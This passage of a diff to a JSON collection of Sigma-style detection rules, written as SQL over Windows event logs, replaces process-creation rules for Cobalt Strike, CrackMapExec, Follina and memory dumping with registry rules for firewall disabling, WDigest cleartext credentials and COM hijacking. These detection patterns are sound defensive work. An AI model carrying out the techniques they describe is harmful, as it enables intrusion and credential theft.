'\\')))))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_cobaltstrike_process_patterns.yml" + "filename": "registry_set_exploit_guard_susp_allowed_apps.yml" }, { - "title": "Pingback Backdoor Activity", - "id": "b2400ffb-7680-47c0-b08a-098a7de7e7a9", + "title": "PowerShell as a Service in Registry", + "id": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "status": "test", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "description": "Detects that a powershell code is written to the registry as a service.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\updata.exe' ESCAPE '\\' AND CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%msdtc%' ESCAPE '\\' AND CommandLine LIKE '%start%' ESCAPE '\\' AND CommandLine LIKE '%auto%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Services\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ImagePath' ESCAPE '\\' AND (NewValue LIKE '%powershell%' ESCAPE '\\' OR NewValue LIKE '%pwsh%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_pingback_backdoor.yml" + "filename": "registry_set_powershell_as_service.yml" }, { - "title": "Mshtml DLL RunHTMLApplication Abuse", - "id": "4782eb5a-a513-4523-a0ac-f3082b26ac5c", - "status": "experimental", - "description": "Detects suspicious command line using the \"mshtml.dll\" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...)", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Outlook Macro Execution Without Warning Setting Enabled", + "id": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "status": "test", + "description": "Detects the modification of Outlook security setting to allow unprompted execution of macros.", + "author": "@ScoubiMtl", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\..\\\\%' ESCAPE '\\' AND CommandLine LIKE '%mshtml%' ESCAPE '\\' AND CommandLine LIKE '%RunHTMLApplication%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\Level' ESCAPE '\\' AND NewValue LIKE '%0x00000001%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_mshtml_runhtmlapplication.yml" + "filename": "registry_set_office_outlook_enable_macro_execution.yml" }, { - "title": "Compress Data and Lock With Password for Exfiltration With 7-ZIP", - "id": "9fbf5927-5261-4284-a71d-f681029ea574", - "status": "test", - "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party utilities", + "title": "Disable Windows Security Center Notifications", + "id": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", + "status": "experimental", + "description": "Detect set UseActionCenterExperience to 0 to disable the windows security center notification", "author": "frack113", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate activity is expected since compressing files with a password is common." + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description LIKE '%7-Zip%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\7z.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7zr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\7za.exe' ESCAPE '\\') OR OriginalFileName IN ('7z.exe', '7za.exe')) AND CommandLine LIKE '% -p%' ESCAPE '\\' AND (CommandLine LIKE '% a %' ESCAPE '\\' OR CommandLine LIKE '% u %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%Windows\\\\CurrentVersion\\\\ImmersiveShell\\\\UseActionCenterExperience' ESCAPE '\\' AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_7zip_password_compression.yml" + "filename": "registry_set_disable_security_center_notifications.yml" }, { - "title": "Suspicious Script Execution From Temp Folder", - "id": "a6a39bdb-935c-4f0a-ab77-35f4bbf44d33", + "title": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry", + "id": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "status": "experimental", - "description": "Detects a suspicious script executions from temporary folder", - "author": "Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton", - "tags": [ - "attack.execution", - "attack.t1059" - ], - "falsepositives": [ - "Administrative scripts" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temporary Internet%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\%TEMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%TMP\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%LocalAppData\\%\\\\Temp%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% >%' ESCAPE '\\' OR CommandLine LIKE '%Out-File%' ESCAPE '\\' OR CommandLine LIKE '%ConvertTo-Json%' ESCAPE '\\' OR CommandLine LIKE '%-WindowStyle hidden -Verb runAs%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\system32\\\\config\\\\systemprofile\\\\AppData\\\\Local\\\\Temp\\\\Amazon\\\\EC2-Windows\\\\%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_susp_script_exec_from_temp.yml" - }, - { - "title": "PowerShell Base64 Encoded Reflective Assembly Load", - "id": "62b7ccc9-23b4-471e-aa15-6da3663c4d59", - "status": "test", - "description": "Detects base64 encoded .NET reflective loading of Assembly", - "author": "Christian Burkard (Nextron Systems), pH-T (Nextron Systems)", + "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.001", "attack.defense_evasion", - "attack.t1027", - "attack.t1620" + "attack.t1112" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\' OR CommandLine LIKE '%AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC%' ESCAPE '\\' OR CommandLine LIKE '%BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp%' ESCAPE '\\' OR CommandLine LIKE '%AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK%' ESCAPE '\\' OR CommandLine LIKE '%WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ%' ESCAPE '\\' OR CommandLine LIKE '%sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA%' ESCAPE '\\' OR CommandLine LIKE '%bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA%' ESCAPE '\\' OR CommandLine LIKE '%WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA%' ESCAPE '\\' OR CommandLine LIKE '%sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA%' ESCAPE '\\' OR CommandLine LIKE '%bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_base64_reflective_assembly_load.yml" + "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" }, { - "title": "Execute Pcwrun.EXE To Leverage Follina", - "id": "6004abd0-afa4-4557-ba90-49d172e0a299", + "title": "CVE-2021-31979 CVE-2021-33771 Exploits", + "id": "32b5db62-cb5f-4266-9639-0fa48376ac00", "status": "experimental", - "description": "Detects indirect command execution via Program Compatibility Assistant \"pcwrun.exe\" leveraging the follina (CVE-2022-30190) vulnerability", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects patterns as noticed in exploitation of Windows CVE-2021-31979 CVE-2021-33771 vulnerability and DevilsTongue malware by threat group Sourgum", + "author": "Sittikorn S, frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.execution" + "attack.credential_access", + "attack.t1566", + "attack.t1203", + "cve.2021.33771", + "cve.2021.31979" ], "falsepositives": [ "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\pcwrun.exe' ESCAPE '\\' AND CommandLine LIKE '%../%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND (TargetObject LIKE '%CLSID\\\\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\\\\InprocServer32\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%CLSID\\\\{7C857801-7381-11CF-884D-00AA004B2E24}\\\\InProcServer32\\\\(Default)' ESCAPE '\\')) AND NOT ((NewValue LIKE '%system32\\\\wbem\\\\wmiutils.dll' ESCAPE '\\' OR NewValue LIKE '%system32\\\\wbem\\\\wbemsvc.dll' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_pcwrun_follina.yml" + "filename": "registry_set_cve_2021_31979_cve_2021_33771_exploits.yml" }, { - "title": "Suspicious Scheduled Task Name As GUID", - "id": "ff2fff64-4cd6-4a2b-ba7d-e28a30bbe66b", + "title": "IE Change Domain Zone", + "id": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "status": "experimental", - "description": "Detects creation of a scheduled task with a GUID like name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate software naming their tasks as GUIDs" + "Administrative scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\' AND (CommandLine LIKE '%/TN \"{%' ESCAPE '\\' OR CommandLine LIKE '%/TN ''{%' ESCAPE '\\' OR CommandLine LIKE '%/TN {%' ESCAPE '\\') AND (CommandLine LIKE '%}\"%' ESCAPE '\\' OR CommandLine LIKE '%}''%' ESCAPE '\\' OR CommandLine LIKE '%} %' ESCAPE '\\'))" - ], - "filename": "proc_creation_win_schtasks_guid_task_name.yml" - }, - { - "title": "HackTool - CrackMapExec Execution", - "id": "42a993dd-bb3e-48c8-b372-4d6684c4106c", - "status": "test", - "description": "This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.", - "author": "Florian Roth (Nextron Systems)", - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\crackmapexec.exe' ESCAPE '\\' OR CommandLine LIKE '% -M pe\\_inject %' ESCAPE '\\' OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -x %' ESCAPE '\\') OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -H ''NTHASH''%' ESCAPE '\\') OR (CommandLine LIKE '% mssql %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -H %' ESCAPE '\\' AND CommandLine LIKE '% -M %' ESCAPE '\\' AND CommandLine LIKE '% -o %' ESCAPE '\\') OR (CommandLine LIKE '% smb %' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% --local-auth%' ESCAPE '\\')) OR (CommandLine LIKE '% --local-auth%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% 10.%' ESCAPE '\\' AND CommandLine LIKE '% 192.168.%' ESCAPE '\\' AND CommandLine LIKE '%/24 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\\\\ZoneMap\\\\Domains\\\\%' ESCAPE '\\') AND NOT (NewValue IN ('DWORD (0x00000000)', 'DWORD (0x00000001)', '(Empty)')))" ], - "filename": "proc_creation_win_hktl_crackmapexec_execution.yml" + "filename": "registry_set_change_security_zones.yml" }, { - "title": "Sideloading Link.EXE", - "id": "6e968eb1-5f05-4dac-94e9-fd0c5cb49fd6", + "title": "Potential Persistence Via Shim Database Modification", + "id": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", "status": "experimental", - "description": "Detects the execution utitilies often found in Visual Studio tools that hardcode the call to the binary \"link.exe\". They can be abused to sideload any binary with the same name", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1546.011" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\link.exe' ESCAPE '\\' AND CommandLine LIKE '%LINK /%' ESCAPE '\\') AND NOT (((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\') AND ParentProcessName LIKE '%\\\\VC\\\\Tools\\\\MSVC\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\InstalledSDB\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\Custom\\\\%' ESCAPE '\\') AND EventType = 'SetValue') AND NOT (NewValue = ''))" ], - "filename": "proc_creation_win_lolbin_sideload_link_binary.yml" + "filename": "registry_set_persistence_shim_databases.yml" }, { - "title": "Process Memory Dumped Via RdrLeakDiag.EXE", - "id": "6355a919-2e97-4285-a673-74645566340d", - "status": "experimental", - "description": "Detects uses of the rdrleakdiag.exe LOLOBIN utility to dump process memory", - "author": "Florian Roth (Nextron Systems)", + "title": "DHCP Callout DLL Installation", + "id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", + "status": "test", + "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.t1574.002", + "attack.t1112" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\rdrleakdiag.exe' ESCAPE '\\' AND CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\') OR (CommandLine LIKE '%/fullmemdmp%' ESCAPE '\\' AND CommandLine LIKE '% /o %' ESCAPE '\\' AND CommandLine LIKE '% /p %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutDlls' ESCAPE '\\' OR TargetObject LIKE '%\\\\Services\\\\DHCPServer\\\\Parameters\\\\CalloutEnabled' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_rdrleakdiag.yml" + "filename": "registry_set_dhcp_calloutdll.yml" }, { - "title": "Remote CHM File Download/Execution Via HH.EXE", - "id": "f57c58b3-ee69-4ef5-9041-455bf39aaa89", + "title": "Disable Windows Firewall by Registry", + "id": "e78c408a-e2ea-43cd-b5ea-51975cf358c0", "status": "experimental", - "description": "Detects the usage of \"hh.exe\" to execute/download remotely hosted \".chm\" files.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detect set EnableFirewall to 0 to disable the windows firewall", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1218.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'HH.exe' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\') AND CommandLine LIKE '% http%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\StandardProfile\\\\EnableFirewall' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\WindowsFirewall\\\\DomainProfile\\\\EnableFirewall' ESCAPE '\\') AND NewValue = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_hh_chm_remote_download_or_execution.yml" + "filename": "registry_set_disable_windows_firewall.yml" }, { - "title": "Suspicious Regsvr32 Execution From Remote Share", - "id": "88a87a10-384b-4ad7-8871-2f9bf9259ce5", + "title": "Potential EventLog File Location Tampering", + "id": "0cb8d736-995d-4ce7-a31e-1e8d452a1459", "status": "experimental", - "description": "Detects REGSVR32.exe to execute DLL hosted on remote shares", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects tampering with EventLog service \"file\" key. In order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting", + "author": "D3F7A5105", "tags": [ "attack.defense_evasion", - "attack.t1218.010" + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\REGSVR32.EXE' ESCAPE '\\') AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Services\\\\EventLog\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\File' ESCAPE '\\') AND NOT (NewValue LIKE '%\\\\System32\\\\Winevt\\\\Logs\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regsvr32_remote_share.yml" + "filename": "registry_set_evtx_file_key_tamper.yml" }, { - "title": "Use of Squirrel.exe", - "id": "45239e6a-b035-4aaf-b339-8ad379fcb67e", + "title": "COM Hijacking via TreatAs", + "id": "dc5c24af-6995-49b2-86eb-a9ff62199e82", "status": "experimental", - "description": "Detects the usage of the \"Squirrel.exe\" binary as a LOLBIN. This binary is part of multiple software installations (Slack, Teams, Discord, etc.)", - "author": "Nasreddine Bencherchali (Nextron Systems), Karneades / Markus Neis, Jonhnathan Ribeiro, oscd.community", + "description": "Detect modification of TreatAs key to enable \"rundll32.exe -sta\" command", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.persistence", + "attack.t1546.015" ], "falsepositives": [ - "Expected FP with some electron based applications such as (1Clipboard, Beaker Browser, Caret, Discord, GitHub Desktop,...Etc)" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\squirrel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\update.exe' ESCAPE '\\') AND (((CommandLine LIKE '% --download %' ESCAPE '\\' OR CommandLine LIKE '% --update %' ESCAPE '\\' OR CommandLine LIKE '% --updateRollback=%' ESCAPE '\\') AND CommandLine LIKE '%http%' ESCAPE '\\') OR (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Discord\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '% --processStart%' ESCAPE '\\' AND CommandLine LIKE '%Discord.exe%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%GitHubDesktop.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--createShortcut%' ESCAPE '\\' OR CommandLine LIKE '%--processStartAndWait%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Teams.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\')) OR (CommandLine LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\yammerdesktop\\\\Update.exe%' ESCAPE '\\' AND CommandLine LIKE '%Yammer.exe%' ESCAPE '\\' AND (CommandLine LIKE '%--processStart%' ESCAPE '\\' OR CommandLine LIKE '%--createShortcut%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%TreatAs\\\\(Default)' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\integration\\\\integrator.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_lolbin_squirrel.yml" + "filename": "registry_set_treatas_persistence.yml" }, { - "title": "Copy From VolumeShadowCopy Via Cmd.EXE", - "id": "c73124a7-3e89-44a3-bdc1-25fe4df754b1", - "status": "experimental", - "description": "Detects the execution of the builtin \"copy\" command that targets a shadow copy (sometimes used to copy registry hives that are in use)", - "author": "Max Altgelt (Nextron Systems), Tobias Michalski (Nextron Systems)", + "title": "Wdigest Enable UseLogonCredential", + "id": "d6a9b252-c666-4de6-8806-5561bbbd3bdc", + "status": "test", + "description": "Detects potential malicious modification of the property value of UseLogonCredential from HKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to enable clear-text credentials", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Backup scenarios using the commandline" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%\\\\\\\\\\?\\\\GLOBALROOT\\\\Device\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%WDigest\\\\UseLogonCredential' ESCAPE '\\' AND NewValue = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_cmd_shadowcopy_access.yml" + "filename": "registry_set_wdigest_enable_uselogoncredential.yml" }, { - "title": "Use of Setres.exe", - "id": "835e75bf-4bfd-47a4-b8a6-b766cac8bcb7", - "status": "experimental", - "description": "Detects the use of Setres.exe to set the screen resolution and then potentially launch a file named \"choice\" (with any executable extension such as \".cmd\" or \".exe\") from the current execution path", - "author": "@gott_cyber", + "title": "Suspicious New Printer Ports in Registry (CVE-2020-1048)", + "id": "7ec912f2-5175-4868-b811-ec13ad0f8567", + "status": "test", + "description": "Detects a new and suspicious printer port creation in Registry that could be an attempt to exploit CVE-2020-1048", + "author": "EagleEye Team, Florian Roth (Nextron Systems), NVISO", "tags": [ + "attack.persistence", + "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1112" ], "falsepositives": [ - "Legitimate usage of Setres" + "New printer port install on host" ], 